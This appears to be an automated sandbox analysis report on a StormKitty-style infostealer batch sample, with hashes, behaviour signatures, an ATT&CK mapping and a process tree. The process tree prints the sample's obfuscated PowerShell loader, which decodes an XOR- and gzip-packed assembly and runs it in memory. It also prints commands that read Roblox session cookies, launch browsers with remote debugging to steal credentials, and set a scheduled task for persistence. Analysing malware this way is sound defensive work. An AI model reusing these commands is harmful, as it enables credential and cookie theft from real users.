Analysis
-
max time kernel
62s -
max time network
49s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
-
submitted
28/03/2025, 01:37
General
-
Target
StormKittyBuilder.bat
-
Size
432KB
-
MD5
7cf5561ba84bda0718d0c93b2ab88d6b
-
SHA1
0c2a5bc7f8105b0d0017186a5a733cc6b6feff69
-
SHA256
449addfee92a5ca256cf35563ee3fb6e61380922803ef24db9aef5e376325458
-
SHA512
236b8a5acf67d4388638683db2616cda0b638774400c8be12effc1bec0e27c30516027675b8cacca22140d178da1a85c3fdac4e560644422d4b8b90d5d9400f8
-
SSDEEP
12288:ikk/8cmfunb4i/d+X7ixl0wi7bOJfZBHnRnl6xu6ibnzeOb:ikzcmE/d+i676xZBHRlP6Wh
Malware Config
Signatures
-
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Executes dropped EXE 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat.exe"StormKittyBuilder.bat.exe" -noprofile -windowstyle hidden -executionpolicy bypass -command $BtCqB = 'gnirtS46esaBmorF'.ToCharArray();[array]::Reverse($BtCqB);$HBrFK = [String]::new($BtCqB);$ooDPF = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat').Split([Environment]::NewLine);$VkrdH = $ooDPF[$ooDPF.Length - 1];$qzpvp = [System.Convert]::$HBrFK($VkrdH);$byYXP = [System.Convert]::$HBrFK('Hn1TY+SEHeJhLmLfjxR6/ti7FHUqnYTip3nYvXFvLjs=');for ($i = 0; $i -le $qzpvp.Length - 1; $i++) { $qzpvp[$i] = ($qzpvp[$i] -bxor $byYXP[$i % $byYXP.Length]); };$JAWhQ = New-Object System.IO.MemoryStream(, $qzpvp);$AwMCR = New-Object System.IO.MemoryStream;$oMZsB = New-Object System.IO.Compression.GZipStream($JAWhQ, [IO.Compression.CompressionMode]::Decompress);$oMZsB.CopyTo($AwMCR);$oMZsB.Dispose();$JAWhQ.Dispose();$AwMCR.Dispose();$qzpvp = $AwMCR.ToArray();[System.Reflection.Assembly]::Load($qzpvp).EntryPoint.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.google.com" --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=1430 --remote-allow-origins=ws://localhost:1430 --disable-extensions --no-sandbox --disable-gpu3⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x268,0x26c,0x270,0x264,0x2e4,0x7ffd476ff208,0x7ffd476ff214,0x7ffd476ff2204⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2100,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2128,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3052,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:134⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3316,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3312 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3560,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3700,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4316,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:94⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4344,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3736,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:94⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4544,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4540 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4680,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4676 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4744,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4740 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4472,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4476 /prefetch:144⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11285⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5228,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5228,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:144⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com" --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=4659 --remote-allow-origins=ws://localhost:4659 --disable-extensions --no-sandbox --disable-gpu3⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffd6482dcf8,0x7ffd6482dd04,0x7ffd6482dd104⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1944,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1936 /prefetch:24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2804,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2820 /prefetch:114⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2812,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2116 /prefetch:134⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2840,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2852 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2860,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2848 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4056,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4052 /prefetch:14⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4636,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4632 /prefetch:144⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /TN "CleanUp" /TR "C:\Users\Admin\AppData\Roaming\Cleanup.exe" /SC ONLOGON /RL HIGHEST /F3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Cleanup.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a7c85eb648de5f3be7d71213fd6e9896
SHA1047718d42cbf2e4c6b4482ff9f5c0c820427cd34
SHA256620d75865be3d638959b7c34bea53741a4bf73ada24afaf4d1c251ac295af641
SHA512c0e97abd9758980219ce148e6f0de6c3e66a11c6bb65caea7f0a1bb2a14115675a879998c9461329c9e2b8445f47b8738a03226200a3e9d656f00c86fc116dd2
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
79KB
MD516370450229296e088a1a9af9a9fdcd1
SHA1c306bc18c5cd1e22431c73556737217bccd749bf
SHA2564d50752fd4398aada487237b890c7d2fae8a6b74d984a30a1a56994e16d8846f
SHA512cb90a616a7fbd1a7bde4c09e5a51b8ff09c815da6ce42cd07c61ef67f9ae291ff829d7bed81f8650096f37a66298e1c65d063bd041cfe066b6cb4d3ae8745761
-
Filesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
Filesize
280B
MD5ecf610ffadb6b05b729f1fb747c925ce
SHA1552e136d3b35f6554388dbf3de27cc3f13aac1aa
SHA256e60d57b0c686fee38e691bd9736e26c41a31f3f058f68c1176c0a71f8108abdd
SHA512ac191b7ef1e260e052031443b9e97b79824c03ae79dc76639317c4f3c70c33ab7b3239cfcf38ae5ed803adf4bb011bb9a9973cb9ba1787b91de2c171cba803b5
-
Filesize
280B
MD5d078e361e0ed3a9230b38d7f87140520
SHA1235c905284ee451b6d19054ce804e8e02a4dceaa
SHA256c568a7aab912809de985c73e6f662c91cf29ef7e6d91ef6a2ff03989f0894338
SHA51279eac09b34e1b2274901e9114c16212b608d4ba2c8875e000b77b6cab80578e25ad5c8020ff0f32c4b57884c7bc41cc494b936b4154f5d922ebba3e6457ac9e7
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
Filesize
1KB
MD5bfd3c60be8622b095b32d0dc9dbd8962
SHA1d2c180b805459668e0dc65db1943b49c43a05d98
SHA2565794490cb2336410c4e2be6f8e73edf9766af61d687c96b3e19f504d33b75cd6
SHA5121cea16f3050d62278ce8e46797b53727f44c1574b224cde54f855db0484f8725f716343d1bd9a15df875f0d5363c5d70fb30e5f31d0e4f9dcb4efb2ee3ef6516
-
Filesize
4KB
MD58c5381ba2b968f6e81968ca3e48794bc
SHA1d0f1160aecfd1f505592b049e19b7352a9ee1a0a
SHA256d7f6d8d88ddd4cffec3d6f7bcbba097d7d44f9aca986fff27da8bc5003be0f2b
SHA512c40f330cacc97430a4fb8322de615ec5d5e580f29321a184ea8b525a64076e4ef4f9549654c493c9a992e383fd51d507b520c0a3a828728ed66919d288847888
-
Filesize
6KB
MD5da2af709d06a2db4af32e767732680c2
SHA1e653129a31114bbe09a0f66d3b1f9abe8924a9ae
SHA256ae7985f4300a8c1f25c3884cab68f52506e3fefd3f632e6783e7610331e004e9
SHA512890a60b1bfc2164bd75e98cd4e7bdd1e93f70188802e31606737e32c6efdf9031c45330401df0a511eb066ad0cefff8851495259aeda922326b9e5c9a52fd354
-
Filesize
7KB
MD5d0a1bb058b7f018f0820abfa248ef21b
SHA1e2ddffb49482a8beb0b2702e4d81debf9d179930
SHA256e4d77a3514ce39841dc929f5c4289331ce77525ef92c8bbd63ca90cdcd661389
SHA512d0e93421805b9eb0be903335e2d0661f696cb777e1a16afc9a66bdc74ecf9f70ab41deaf90559eb4975771fdc2f614d6d8c119c1a0f18020f8720a6260d73c66
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5f3cb7da104ca6b7e4b6b3a33b33773c1
SHA1a13c6a7a5f0874464dad9a9f3876163c789f0d3f
SHA256b749a2215c1fe3871db9b20ee4d038bcf6aa73112d9bb7c3c8b558b9a653df08
